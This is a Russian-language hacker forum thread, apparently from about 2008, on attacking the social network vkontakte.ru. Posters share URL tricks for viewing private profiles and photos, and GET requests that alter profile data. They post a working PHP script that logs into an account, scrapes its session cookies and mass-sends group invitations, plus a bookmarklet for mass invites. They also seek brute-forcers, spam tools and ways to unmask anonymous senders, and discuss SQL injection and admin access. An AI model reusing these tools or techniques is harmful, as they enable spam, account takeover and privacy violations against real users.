Флудер личных сообщений юзеров vkontakte.ru

Это штучка работать не буд....! потому, что теперь на сервак вместе с письмом передаётся параметр id="secure" name="secure" value="8837dd1429cca27e6b1c" есть маза что он както связан с id пользователя (3387642 - в данном случае), есть какие нить предположения какая у них там зависимость?

А вот и сам движок для детального изучения:

http://ipload.org/en/file/731/Agriya-Kootali-FaceBook-Clone--iAG--Nulled-rar.html

Контакт являеться немного дороботанной копией facebook.com

Кто нить смог бы переписать брут паролей чтобы он работал через прокси, а то если забанят не очень хочется там свой аккуант терять)

2porter портер скорее всего не как так как на машине пользователя данный код не вополняеться !а следовательно и куков не видать!

нашел еще один глюк, попробуйте в статусе написать Deleted, хз с чем связано такое поведение движка.

timlame, никакой реакции.

нашел еще один глюк, попробуйте в статусе написать Deleted, хз с чем связано такое поведение движка.

так и не понял в чем странность ? может поясниш ?

Deleted большими буквами, не обратил внимания что форум регистр поменял

автозамена, чтоб небаловались))) так же как и с javascript -> javas?1?ript

Вот тут нашёл ссылочки, даже незнай, понадобятся они вам или нет:
------------------------------------------------------------
http://vkontakte.ru/niftycube.js |
http://vkontakte.ru/reg0 |
This vulnerability affects /faq.php (GET s=11). |
------------------------------------------------------------

и к чему это ?

Небось сканером уязвимостей ссылочки получены 8)
Не думаю, что от них много толку.

гениальные ссылки s=11 :)
блин не что иное что faq.php получает переменную S задаваемую пользоватеем могло бы быть полезно если б там скуль был !!!но там его нет что не удевительно !
reg0 - форма регистрации то же без надобности !
ну и niftycube.js фаил которой можно прочитать но не чего полезного там я тоже не увидел !

CyberTm
Бруть с похаченого сервака )

Oreen
Фейсбук это совсем другой движок, у них только внешний вид сходный

сейчас добавилась новая фича - мнения, если кто не видел, что не могу понять, эти мнения могут оставлять только друзья, но анонимно.
в принципе, сообщения уходящие от друзей, а приходящие просто анонимно - даже чисто гипотетически реализовать не сложно, но там есть черный список (ЧС), все мнения имею разные ИД, в том числе и от одного юзера, посему жутко интересно как система ЧС там отслеживает эти мнения и как она их блокирует.
то есть очевидно что это лазейка к определению автора мнения

Мне ,честно говоря, очень интересно они сохраняют удаленные личные сообщения или делают тоже самое что с видео и картинками и всем прочим после их удаления (хотя я на этот счет писал одному из админов и он мне сказал,что видео и картинки сохраняются до тех пор пока пользователь основательно не удалится из контакта)?

Кто что знает про нуфию функцию vkontakte Мнения? Мб есть способ узнать от кого пришло то или иное мнение?!

Даже если они "не включены" в настройках, можно например гет запросом написать мнение
http://vkontakte.ru/opinions.php?act=a_sent&to_id=USER_ID&message=MESSAGE
и потом просмотреть

Узнать возраст закрытого профиля можно легко :)
Новый сервис "Предложения" позволяет его видеть =\

Осталось только несколько миллионов раз нажать поиск,чтобы найти нужного человека))))

А какой нить способ (кроме брута) есть что б смотреть закрытые анкеты?

часто при закрытом профиле остаются незакрытыми отдельными настройками приватности
photos.php?id=ID
photos.php?id=ID&act=user
wall.php?id=ID

часто при закрытом профиле остаются незакрытыми отдельными настройками приватности
photos.php?id=ID
photos.php?id=ID&act=user
wall.php?id=ID
Спасибо ;)

бляя, вот народ, это сайт, где тусуются большинство, наверное, хакеров страны, и вы обсуждаете реально то, что было известно где-то на второй месяц работы вконтакте.
я вот не верю, ну не может же быть так, что в этом ресурсе нет никаких дыр. ведь все знают, что на любую защиту есть взлом. вконтакте - это ведь не сайт министерства обороны США или Микрософта, хотя ведь и их умудрялись ломать, мне просто интересно, чего все обсуждают какую-то левотню и ничего по существу.

например, неужели нет никаких догадок, хотя бы в теории как сделали мнения анонимными, хотя бы принцип какой-там, там ведь есть ЧС у мнений, значит система отслеживает все мнения (а иначе как их блокировать).

Да мнения устроены не самым сложным образом
Вот условный разбор работы контактовского скрипта мнений, пишет Алексей Башкатов:
"...эта строчка непосредственно вызывает скрипт добавления мнения в базу:
ajax.post('/opinions.php', {'act': 'a_sent', 'to_id': op_id, 'message':
результатом этой строчки будет вызов php-скрипта opinions.php с переданными ему значениями act=a_sent (т.е. действие = отправка мнения), to_id=op_id (номер пользователя, которому мнение отсылается) и messahe="лалалал" (непосредственно сам текст сообщения. берется из формы). твой номер (для сохранения в базу кем составлено это мнение) - берется скриптом из кукисов. никакой шифрации здесь нет..."
Узнать ид отправителя можно только инжектом в БД контакта, потому что данные переменные хранятся только на сервере и не передаются клиенту. Так что народ ищем скуль ошибки)

Следовательно, если попытаться подменить Id во время отправки, то можно написать от другого Id? А так как в мнениях мона добавить в черный список человека, то... ход мыслей улавливаете?

// нет, мнения с другим remixmid не доходят.

сразу скажу не профессионал !
насчет почему нет багов ... ну движок добротно написан ....и с трудом верится что павел дуров один его катал ! а раз движок хороший то лезть надо через другие дыры .... вопрос только в том что многие боятся из-за слухов про фсб .... ведь никому не хочеться рисковать ради просмотра чужих анкет и фотак ... а коммерческой выгоды от доступа к вконтак трудно представить! и тем более не известно зачем всё это запущено может он и запущен для отлова он лайн хулигонья но тогда он слишком неприступен зделан !!
теперь на счёт мнения .. слышал что модераторы могут смотреть отправителя мнения !! и кстати все отправленные табой мнения записываются у тебя в мениях !

сразу скажу не профессионал !
насчет почему нет багов ... ну движок добротно написан ....и с трудом верится что павел дуров один его катал ! а раз движок хороший то лезть надо через друг
кто те сказал что он его катал =\

кто те сказал что он его катал =\
везде Павла дурова называют создателем вконтакте ))

везде Павла дурова называют создателем вконтакте ))
Автором проекта является Павел Дуров. (с) wiki

http://ru.wikipedia.org/wiki/Facebook

Я говорил с одним из модеров. сказали что ни у кого нет доступа к мнениям))

Следовательно, если попытаться подменить Id во время отправки, то можно написать от другого Id? А так как в мнениях мона добавить в черный список человека, то... ход мыслей улавливаете?
// нет, мнения с другим remixmid не доходят.

Потом если посмотреть черный список - там ничего не будет.

в мнениях есть одна фишка...
Там нет лимита типа одна отправка в секунду!!!! СПАМ!!!! Будет не лень, напишу спамер.

ну лимит могут ввести потом, кстати, обратите внимание - ввели функцию ответов к мнениям, ты шлешь ответ, а он идет как личка, тому кто изначально отравил мнение? то есть это еще один канал к снижению анонимности

раз есть ответы на анонимные мнения ... значит там должна быть привязка к Id осталось только узнать какая )))

везде Павла дурова называют создателем вконтакте ))
блин, на заборе QЙ написан!
нифига он не писал, просто доработал =\ и то может не он... и то может павла дурова этого не существует... наивный ты наш

раз есть ответы на анонимные мнения ... значит там должна быть привязка к Id осталось только узнать какая )))
Значит ее может и не быть)) Скорее всего просто идет отправка ответ на такое то мнение, а потом сервер отправляет его кому нужно.

Дуров никогда не отдыхает, он ачат всегда читает!! Ошибку с изменением картики на большую исправил)

привязка к id конечно есть, но выяснить её просто так не получится, просто каждому мнению в таблице сопоставляется id пользователя, но вот на страницу это нигде не выводится

Наверное этот вконтакте дейцсствительна финансируется ФСБ....ибо у ФСБ дофига денег а недумаю что эти студенты смогли бы оплачивать там сервера мощные...да и рекламы (баннеры)в контакте непредусмотрено...

Наверное этот вконтакте дейцсствительна финансируется ФСБ....ибо у ФСБ дофига денег а недумаю что эти студенты смогли бы оплачивать там сервера мощные...да и рекламы (баннеры)в контакте непредусмотрено...
БЛИН ДА ТЫ ЧО.... а я то думал...

кого порой на ачате не встретишь...

По заявкам завсегдатаев вконтакта написал простенький чекер акков,
вбиваете майл, пасс - чекаете, в случае успеха узнаёте id акка и
имя зареганного, в комплекте положил исходник на делфях, для тех
кто захочет развить идею и тех кому просто интересна реализация,
для юзания у вас должен быть установлен компонент Indy [10].
Все вопросы/пожелания)) приветствуются B)
Качать: _http://depositfiles.com/files/3662036
Пасс: Pir4tt.NE.vkontakte

Просматриваем закрытый профиль пользователя

Для просмотра закрытого профиля требуется:
Узнать ID анкеты. Делается это просто, наводим мышку на "Друзья ИМЯ". Копируем ссылку.
*http://vkontakte.ru/friend.php?id=000000
Цифры после "id=" и есть ID профиля. Копируем эти цифры и вставляем в нужные нам ссылки:

Фотографии со мной:
_http://vkontakte.ru/photos.php?act=user&id=000000

Фотоальбомы:
_http://vkontakte.ru/photos.php?id=000000

Видеозаписи:
_http://vkontakte.ru/video.php?id=000000

Заметки:
_http://vkontakte.ru/notes.php?id=000000
Во всех записях можно оставлять комментарии.


Просматриваем закрытые фотографии


В vkontakte.ru можно просматривать и закрытые фотографии
Если увеличение фотографии не возможно, и вам выдают табличку с текстом:
Вы не можете просматривать этот альбом, так как его владелец установил ограничения на просмотр для тех, кто не является его другом. Назад.

Копируем ссылку на изображение:
_http://cs52.vkontakte.ru/u2772114/4229389/s_1f77999320F3f.jpg

После в скопированной ссылке меняем букву перед знаком "_" на x :
_http://cs52.vkontakte.ru/u2772114/4229389/x_1f77999320F3f.jpg

дорогой Solide Snake

ты вернулся из прошлого походу :))

все эти темы были известны ещё и в начале 2007 года, кроме того, большая часть из них уже не работает, в том числе и с фотографиями, которые были загружены после 31 октября (примерно) 2007 года (кстати, про это уже сказано чуть выше в топике 142)

После в скопированной ссылке меняем букву перед знаком "_" на x :

404 Not Found

а как тогда скрытые фотки посмотреть?

Пипл , как можно ломануть анкету или узнать мыло анкеты?

Я послал на фейк Павла дурова)))
он мою анкету залочил

2E}I{uk
Никак. В закрытых профилях (ВРОДЕ!!!!) можно смотреть открытые альбомы если помнишь адрес.

Там кстати введен sms биллинг. монетаризация вконтакте началась))

Парни зацените страницу http://vkontakte.ru/id2137737 там в аудио записях время =)

если в зайти в "Моя Страниц ред." -> Образование и в адрессной строке добавить "&time=welcome&subm=" то пропадет фамилия и имя ;)

т.е. что-то типа этого: "http://vkontakte.ru/profileEdit.php?page=education&time=welcome&subm="

obli_, c "&time=welcome&subm=" - круто 8) Пожалуй, первый интересный баг в последнее время.

obli_, c "&time=welcome&subm=" - круто 8) Пожалуй, первый интересный баг в последнее время.
кстати, пропадают обновления друзей...

/profileEdit.php?subm=10&sex=0 стирает ваш пол

Andrich, у меня каменты и новости работают...

Andrich, у меня каменты и новости работают...
странно у меня теперь тоже, но вчера даже надписи обновления не было... :confused:

если в зайти в "Моя Страниц ред." -> Образование и в адрессной строке добавить "&time=welcome&subm=" то пропадет фамилия и имя ;)

т.е. что-то типа этого: "http://vkontakte.ru/profileEdit.php?page=education&time=welcome&subm="
А как обратно вернуть? :)

если в зайти в "Моя Страниц ред." -> Образование и в адрессной строке добавить "&time=welcome&subm=" то пропадет фамилия и имя ;)

т.е. что-то типа этого: "http://vkontakte.ru/profileEdit.php?page=education&time=welcome&subm="
уже не работает =(((

уже не работает =(((
у меня работает...

Причем также сбрасываются школа-универ

Люди добрые, подскажите п-та есть ли у кого-нибудь спамилка для стен групп (вк)!? Не просто скрипт = а уже готовая программа! Или же все же скрипт = но рабочий, и если поподробнее как им пользоваться!? Заранее благодарен!

Знаете, кста, что оригинальное название vkontakte.ru "Студенты в контакте"?))))

да и чёрт с ними,кса эти баги уже неактуальны ;)

AlexV, специально для тебя - ИДИ В ЖОПУ! Учить сам писать.

А ты уже ничего нормального и не напишешь))))
1. Стоит анти флуд. Одинаковые сообщения не пишутся.
2.Не друзьям нельзя больше чем 20 сообщений в день отправлять

В "Предложение" можно писать html , только они почему то после обновления странички движек их преобразует в текст.

Если в "Предложение" ввести длинную строку с тегами ,я пробовал большую строчку <div .......... </div> то при добавлении у меня часть строки оказалась какбы частью кода сайта ,тоесть движек обрезал строку до <div ........ а ......<div> уже шло после поля в коде странички

Пока только научился прятать неразрывной пробел, он его сьедает норм

Don1=2, зачем же так жестко!? :-)
А есть скрипт или как можно - пригласить в группу народ более 40 человек в день!?

В группе http://vkontakte.ru/club366536
В названии стоят теги <br> админ группы говорит друг делал. Сам незнает.
Баг есть, но как его использовать незнаю (

как можно узнать емаил в контакте??

спросить :)

а как нибудь по другому

Доброго времени суток, всем!
Если кому интересно - выкладываю, демо-версию спамилки для стен групп ВК = ссылка (http://ifolder.ru/5637953)

А также видео как это делается = Ссылка (http://ifolder.ru/5637884)

Кто может помочь разобраться с этим и сделать полную версию!?

Кстати, прошу прощения за назойливость, а случаем никто не знает, как можно собирать номера асек у людей в контакте!? Или к примеру с групп Icq!?

также как и с любых других сайтов-граббером

Не знаю =))) писали это или нет =))
Вообщем )) оставляем о ком-то своё мнение, затем жмём просмотр. Можно прочесть всё что писали ему в мнениях. =) Забавно почитать )

нуууу а что это баг чтоли?))
P.s.Вроде все знали, или только я)))

Народ, предлагаю объединить все темы по ВК, в одну! Где будут выкладываться все баги, и проги для ВК!

Кстати, я в ВК, у одного человека в группе видел авто-бота для приглашений! Кто-нибудь знает как это сделать!?

Скрипт для рассылки приглашений о вступлении в группу
на www.vkontakte.ru

<?


error_reporting(0);
set_time_limit(0);
# Всякие переменные
$user_agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11";

$begin = intval($_POST['begin']);
$end = intval($_POST['end']);
$gid = intval($_POST['gid']);
$email = strip_tags($_POST['email'], "");
$pass = strip_tags($_POST['pass'], "");

if($begin == '') {$begin = "0";}
if($end == '') {$end = "0";}
if($gid == '') {$gid = "0";}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>ВКонтакте инвайтер (С) NNNS</title>
<style type="text/css">
<!--
.tablichko {
font-family: Arial, Helvetica, sans-serif;
background-color: #F7FCFD;
border-top-width: 1px;
border-bottom-width: 1px;
border-top-style: solid;
border-bottom-style: solid;
border-top-color: #E0F3F8;
border-bottom-color: #E0F3F8;
height: 100px;
}
.tit {
font-family: Georgia, "Times New Roman", Times, serif;
font-size: 24px;
color: #1C6679;
}
.comment {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
color: #289AB7;
}
.inputko {
font-size: 12px;
color: #289AB7;
height: 16px;
text-align: center;
border-top-width: 1px;
border-left-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: solid;
border-left-style: solid;
border-top-color: #E0F3F8;
border-left-color: #E0F3F8;
border-bottom-width: 1px;
border-bottom-color: #E0F3F8;
}
.inputko:focus {
background-color: #E8F5F9;
}
.inputko2:focus {
background-color: #E8F5F9;
}
.inputko3:focus {
background-color: #FFF;
}
.buttoncheg {
color: #FFFFFF;
background-color: #1C6679;
border: 1px solid #E0F3F8;
height: 20px;
font-size: 12px;
width: 80px;
}
.inputko2 {
font-size: 12px;
color: #289AB7;
height: 16px;
text-align: center;
border-top-width: 1px;
border-top-style: solid;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-top-color: #E0F3F8;
border-bottom-width: 1px;
border-bottom-color: #E0F3F8;
border-right-width: 1px;
border-right-color: #E0F3F8;
}
.inputko3 {
font-size: 12px;
color: #289AB7;
height: 16px;
text-align: center;
width: 78px;
border-right-width: 1px;
border-bottom-width: 1px;
border-left-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: solid;
border-right-color: #E0F3F8;
border-bottom-color: #E0F3F8;
border-left-color: #E0F3F8;
background-color: #F7FCFD;
}
.vtab {
color: #48BAD7;
border-bottom-width: 1px;
border-bottom-style: solid;
border-bottom-color: #DFF3F9;
font-size: 12px;
font-family: Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body>
<form method="post" action="">
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="tablichko">
<tr>
<td align="center" valign="middle"><span class="tit"> ВКонтакте инвайтер<br />
</span>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td colspan="2" align="center" valign="middle" bgcolor="#FDFFFF" class="comment">Диапазон пользователей (с/до) </td>
<td valign="top">&nbsp;</td>
<td width="100" align="center" valign="middle" bgcolor="#FDFFFF" class="comment">email </td>
<td width="100" align="center" valign="middle" bgcolor="#FDFFFF" class="comment">пароль</td>
</tr>
<tr>
<td valign="top"><input name="begin" type="text" class="inputko" id="begin" value="<?=$begin;?>" /></td>
<td valign="top"><input name="end" type="text" class="inputko" id="end" value="<?=$end;?>" /></td>
<td valign="top"><input name="submit" type="submit" class="buttoncheg" id="submit" value="Пригласить" /></td>
<td width="100" valign="top"><input name="email" type="text" class="inputko2" id="email" value="<?=$email;?>" /></td>
<td width="100" valign="top"><input name="pass" type="text" class="inputko2" id="pass" value="<?=$pass;?>" /></td>
</tr>
<tr>
<td valign="top">&nbsp;</td>
<td align="right" valign="middle"><span class="comment">ID группы &gt;</span></td>
<td align="center" valign="middle" bgcolor="#FDFFFF" class="error"><input name="gid" type="text" class="inputko3" id="gid" value="<?=$gid;?>" /></td>
<td width="200" colspan="2" valign="middle">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
</form>
<br />
<?php
if ($_POST['submit']) {
# Соединяемся с сервером ВКонтакте.ру
$fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);
if (!fp) {die();}
# Авторизуемся
$out = "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n";
$out .= "Host: vkontakte.ru\r\n";
$out .= "User-Agent: ".$user_agent."\r\n";
$out .= "Cookie: income=1\r\n";
$out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";
fwrite($fp,$out);
$ans='';
while(!feof($fp))
{
$ans.=fgets($fp,128);
}
fclose($fp);
# вытаскиваем кукисы из ответа сервера
preg_match("/revalidate(.*?)Location/is", $ans, $cookies);
$cookies = str_replace("Set-Cookie: ", "",$cookies[1]);
preg_match("/remixchk(.*?);/is", $cookies, $cook1);
preg_match("/remixmid(.*?);/is", $cookies, $cook2);
preg_match("/remixemail(.*?);/is", $cookies, $cook3);
preg_match("/remixpass(.*?);/is", $cookies, $cook4);
$cook1 = "remixchk=".$cook1[1]."; ";
$cook2 = "remixmid=".$cook2[1]."; ";
$cook3 = "remixemail=".$cook3[1]."; ";
$cook4 = "remixpass=".$cook4[1]."; ";
$acook = $cook1.$cook2.$cook3.$cook4;
$acook = str_replace ("==", "=", $acook);
# Открываем новое соединение
for($i=$begin;$i<$end;$i++) {
$fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);
$out = "GET /groups.php?act=ajaxinv&gid=".$gid."&id=".$i." HTTP/1.0\r\n";
$out .= "Host: vkontakte.ru\r\n";
$out .= "User-Agent: ".$user_agent."\r\n";
$out .= "Cookie: ".$acook."\r\n\r\n";
fwrite($fp, $out);
$ans='';
while(!feof($fp))
{
$ans.=fgets($fp,128);
}
# достаем результат
preg_match("/>(.*?)</is", $ans, $result);
# Выводим его
echo "<center><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" class=\"vtab\">
<tr>
<td width=\"70\" valign=\"middle\">".$i."</td>
<td width=\"350\" valign=\"middle\">".$result[1]."</td>
</tr>
</table><center>";
ob_flush();
flush();
fclose($fp);
sleep(1);
}
}
?>

</body>
</html>

Старый боян, нерабочий ибо 1 акк приглашает макс 40 человек в сутки.

diehard что мешает зарегать авторегером порядка 200 300 акков и получить
40*300=12000приглашеней
+ добавь users.txt(СО СПИСКОМ АККОВ) и это будет делать удобнее

Автореггер тоже нерабочий боян, вконтакт уже не шлет письмо с авторизацией на po4ta.com

кароче все возможные баги и уязвы, которые я знал, прикрыли...

Народ, предлагаю объединить все темы по ВК, в одну! Где будут выкладываться все баги, и проги для ВК!

Кстати, я в ВК, у одного человека в группе видел авто-бота для приглашений! Кто-нибудь знает как это сделать!?
Обычный JavaScript в цикле проставляющий галочки

прога печатающая "БООООРЩ!!!!!!11111"
http://dump.ru/files/o/o215260216/

как юзать хоть ее?

прога печатающая "БООООРЩ!!!!!!11111"
http://dump.ru/files/o/o215260216/
ПРИБЬЮ НАХ!!!!!!!!!!!!!! :mad: :mad: :mad:
у меня винт слетел от нее

как юзать хоть ее?
ты на трой её сначала проверил?

Народ, а так никто и не разбирал демо версию спамилки стен для контакта!? Как ее можно разобрать!? Через Delphi?

Жмем линку (http://vkontakte.ru/profileEdit.php?subm=10&sex=3&status=4&status=4&with=1498579&bday_day=76&bday_month=4&bday_year=2348&bday_visibility=1&home_town=penisovo&political=6&religion_name=%E3%E5%E9-%ED%E0%F2%F3%F0%E0%EB%E8%F1%F2&religion_id=0) и смотрим изменения в воем профиле ;)


Находил вот еще такое:


1. Выделяете тектс
2. нажимаете "Пригласить в группу"
3. Вставляете текст в самую верхнюю адресную строку в место сайта.
4. Ток пробел в слове javasсript НАДА УБРАТЬ ))) и Enter

java script:function addall(){var butt_all='<b onclick=\'';var chtulhu=document.getElementsByTagName("input");for(var azatoth=0;azatoth<chtulhu.length;azatoth++){ if (chtulhu[azatoth].type=="checkbox"){ butt_all+='addToInvite('+chtulhu[azatoth].name+');'; }}butt_all+='\'>[>>>Привет! Включайся!<<<]</b> '; j=0; var div_s=document.getElementsByTagName("div");for(var i=0;i<div_s.length;i++){ if (div_s[i].className=="pad"){ j++; if(j==2){ div_s[i].innerHTML=butt_all+div_s[i].innerHTML; }}} } addall();

4. Появилась надпись над списком друзей "Привет! Включайся!"
5. нажимаете на нее и приглашаете всех в нашу группу!

И что изменилось?

Народ, а так никто и не разбирал демо версию спамилки стен для контакта!? Как ее можно разобрать!? Через Delphi?

только дезасемблировать... и читать ассемблеровские команды!! найдёшь исходники на делфе поделись ;)

Finiks прочитай свое имя и прочие данные.

Трэш, от этого запроса уже ничё не меняется)) там Post

ясно уже убрали гейт =\

есть у кого спамер ?! чёт ненашёл

Трэш, поздновато))))

Сообщение от grishka
есть у кого спамер ?! чёт ненашёл

Есть демо-версия. Но вот полную никто то ли не хочет, то ли не может сделать...

прога печатающая "БООООРЩ!!!!!!11111"
http://dump.ru/files/o/o215260216/

Ну полный пиздец!!! Что за вирусы блин тут распространяешь!
У меня после неё - на винте, где два логических диска - нарушена таблица размещения файлов. Винт отдал в контору по восстановлению - ещё неизвестно, что удастся восстановить.
Кроме того, уже не знаю сопадению ли это или нет. Где-то после нескольких запусков компа, у меня сдохла материнка!!! Из-за чего новый комп придётся покупать.

Касперский 7.0 её как вирус не засёк, падла. Я специально проверил этот файл перед запуском. :mad:

(Материнка не от вируса здохла а от конторы где куплен комп)
В контакте оборзели!!!!!
Они отметели мою страницу как недоставерную из за того что я пытался вставить место своего имени алерт =)
И теперь при нажатии кнопки показать старые данные он выдает:
какой то бред Goblin ******

Ну полный пиздец!!! Что за вирусы блин тут распространяешь!
У меня после неё - на винте, где два логических диска - нарушена таблица размещения файлов. Винт отдал в контору по восстановлению - ещё неизвестно, что удастся восстановить.
Кроме того, уже не знаю сопадению ли это или нет. Где-то после нескольких запусков компа, у меня сдохла материнка!!! Из-за чего новый комп придётся покупать.

Касперский 7.0 её как вирус не засёк, падла. Я специально проверил этот файл перед запуском. :mad:
я же предупреждал))

попробуйте написать в поиске музыки или видео mix. Эт у меня только так?

видимо многа миксов там

Ну полный пиздец!!! Что за вирусы блин тут распространяешь!
У меня после неё - на винте, где два логических диска - нарушена таблица размещения файлов. Винт отдал в контору по восстановлению - ещё неизвестно, что удастся восстановить.
Кроме того, уже не знаю сопадению ли это или нет. Где-то после нескольких запусков компа, у меня сдохла материнка!!! Из-за чего новый комп придётся покупать.

Касперский 7.0 её как вирус не засёк, падла. Я специально проверил этот файл перед запуском. :mad:

Зря ты в контору отдал! У меня тоже самое было из-за этого вируса! Сижу через сервер нетовский, там нод стоит, у меня каспер 7 с каждодневным обновлением - ничего из этого вирус не спалило! Но отчаиваться не стал! Советую скачай прогу GetDataBeck 3 - идеально восстановил все данные на винте, правда виндовс все равно пришлось переустанавливать!

P.s. Так что, никто выдирать исходник кода спамилки из демо-версии не собирается!? Народ, кто может помочь!? Я бы сам = да только пока не умею....

AlexV, в биореактор надо таких как ты надо.

Зря ты в контору отдал! У меня тоже самое было из-за этого вируса! Сижу через сервер нетовский, там нод стоит, у меня каспер 7 с каждодневным обновлением - ничего из этого вирус не спалило! Но отчаиваться не стал! Советую скачай прогу GetDataBeck 3 - идеально восстановил все данные на винте, правда виндовс все равно пришлось переустанавливать!
а Нод, что запалил этот вирус?
касательно проги GetDataBack 3. я так понимаю у тебя тоже самое - нарушение таблицы размещения файлов в НТФС.
А ты как восстанавливал? просто подключил винт к другому компу, где винда стояла? вообще всё удалось восстановить, а логические разделы тоже?

а Нод, что запалил этот вирус?
касательно проги GetDataBack 3. я так понимаю у тебя тоже самое - нарушение таблицы размещения файлов в НТФС.
А ты как восстанавливал? просто подключил винт к другому компу, где винда стояла? вообще всё удалось восстановить, а логические разделы тоже?
Нод тоже не запалил. Да было тоже самое... Поставил винт в другой комп - запустил прогу, она все просканировала, потом сохранил нужные мне все файлы, восстановилось все намана! Логические разделы - нет! Потом форматнул и поставил винду заново!

Там алгоритм хэширования чиcтый md5($pass) ?
PS Я про vkontakte.ru

-=lebed=-
Да, просто md5($pass) это и хранится в куках

Народ, все посты прочитал сначала и аж прозрел...
Неужели куча опытных взломщиков не могут найти, как vkontakte на лопатки положить?!
Ну не может у них быть такой сверхсильной защиты!!!
По поводу Дурова, так он по ходу действительно за основу facebook.com взял. Там если зарегаться и в поиск ввести Pavel Durov, то увидите ту же фотку, что и вконтакте! =)
Мне вот интересно, народ действительно баги найти не может или просто делиться не хочет, чтоб не пофиксили?

в асе спрашивали. Описываю как женить себя на себе =). Делать лучше через оперу
заходите в http://vkontakte.ru/profileEdit.php Выбераете Женат, делайте в опере просмотр хтмл кода. Ищите строки вида <option value = 'чейто номер'>Кто то там</option> вставляете свое тогда <option value = 'ваш ид'>Я</option> сохраняете страницу и выбераете в списке женат на Я. Сохранить и все =) Еще работает, только что проверил

думаю знают, но не говорят, даже не изза того что пофиксят

nfm, никто не собрался делиться тем, чем на данный момент можно сделать деньги.

.acme, ну а что такое,почему бы не сказать,тут же народ сидит не тупой и не лоховской!просто так фигней не будут страдать

всякие бывают..

Прикольна женился на себе)

.acme,я не понял твоего высказывания ко мне. Мне пофиг что никто делиться не хочет,я ни у кого не прошу и мне не надо это, я просто выложил что знаю и все =)

NFM, .acme хотел, скорее всего, мне ответить на предыдущий пост, да ошибся одресатом малость))
А теперь моя мысля...
Если я хочу просмотреть фотку, а ее могут просматривать только друзья пользователя, то можно ли каким-нибудь способом зашифроваться под друга? В зависимости от того, где проверяется моя личность перед принятием решении о доступе к фотке я думаю возможны 2 варианта:
1) если проверка через исходный код, то сохранить у себя на компе, подредактировать ид со своего на чужой(друга жертвы) или что-то похожее
2) если проверка через кукисы - подредактировать кукисы(может это для кого-то звучит тупо, но как там идет проверка я и не догадываюсь)
ЗЫ: если я написал бред, то не судите строго, так как все-равно лучше хоть какие-то идеи выдвигать, чем просто языком без толку ляпать, как тут многие делают!!((

да зарегься просто под его фамилию и типа давай дружить однофамилец и все =)

Может багов подабавилось с добавлением функции Приложения?
Никто не тестил?

NFM, да, ошибся малость :D. Пост был адресован t3rmit :)

t3rmit,
Скорее всего проверка идёт через код, возможен обман через оперу, вот думаю сейчас проверить, если смогу, то отпишусь
Через куки просто не может быть))

наверняка именно 4ере3 куки. Влом проверять, но на 99 % в этом уверен. В куках записан ID, email, md5 hash пароля. пхп-скрипт проверяет id, если в друзьях, то разрешает просмотр. Если просто подменить id в куках на id друга жертвы, то все равно не посмотрите картинки, сверяется еще и хеш пароля... короче вас кинет на индексовую страницу после такого фокуса...

По поводу мелких багов контакта: можно менять года (рождения, учебы в универе/школе и т. д.). Делается таким же способом, как и женитьба на самом себе: редактируете в опере страничку... У меня стоит 777 августа 1 года ))) если поставить какой-нить 11112008 год рождения, то ваш возраст будет минус 1111000...

При регистрации можно сделать себе имя в столбик или вобще его убрать. Для этого инпуты с именем и фамилией меняем на текстариа (в той же опере), вписываем туда 4то необходимо, далее javascript: this.disabled=true; document.regMe.submit();

Ну, и еще по-мелочи:
статус можно сделать в столбик... тоже имут на текстариа меняем...
Можно еще комментировать заметки у не друзей, даже если эти заметки закрыты. Но для этого нужно знать id заметки, а узнать его может друг ))) ну или если ссылка на данную заметку где-нить валяется....

наверняка именно 4ере3 куки. Влом проверять, но на 99 % в этом уверен. В куках записан ID, email, md5 hash пароля. пхп-скрипт проверяет id, если в друзьях, то разрешает просмотр. Если просто подменить id в куках на id друга жертвы, то все равно не посмотрите картинки, сверяется еще и хеш пароля... короче вас кинет на индексовую страницу после такого фокуса...
ну так это же уже идёт через код

Все это делает пхп-скрипт на стороне сервера и следовательно редактирование в опере страницы у себя, локально, делу не поможет ))) так что не тратьте время впустую, а ищите скульинъекции х) гы, ночью удалили один из моих акков, он был в столбик... Пара3иты! Но если не светиться, т0 прожить можно довольно долго )))

Все это делает пхп-скрипт на стороне сервера и следовательно редактирование в опере страницы у себя, локально, делу не поможет ))) так что не тратьте время впустую, а ищите скульинъекции х) гы, ночью удалили один из моих акков, он был в столбик... Пара3иты! Но если не светиться, т0 прожить можно довольно долго )))
попробуй хоть одну найти))
я полночи рылся, нихрена и не нашёл((

когда была шумиха с тем что народ удаляют мне подвесили сообщение что анкета содержит неверную инфу и когда её я исправлю нужно отправить сообщение админам
вот сцилка http://vkontakte.ru/admin.php?act=fixed&wid= незнаю может кому поможет попасть в админку а это было бы уже интерестно !

Remiznik
Залогиниться под меил и пасс первого юзера, тоже самое

я вот что думаю .... админы же на сайте тоже пользователи ..значи у их анкет есть какоето разрешение к админской страничке ....если узнать то можно попробовать выбить права админа !

когда была шумиха с тем что народ удаляют мне подвесили сообщение что анкета содержит неверную инфу и когда её я исправлю нужно отправить сообщение админам
вот сцилка http://vkontakte.ru/admin.php?act=fixed&wid= незнаю может кому поможет попасть в админку а это было бы уже интерестно !
ну так сразу в админку не попадёшь, а вот посмотреть на инки можно

я вот что думаю .... админы же на сайте тоже пользователи ..значи у их анкет есть какоето разрешение к админской страничке ....если узнать то можно попробовать выбить права админа !
правильно мыслишь))

"какое-то разрешение" висит в базе

Я думаю, что структура следующая:
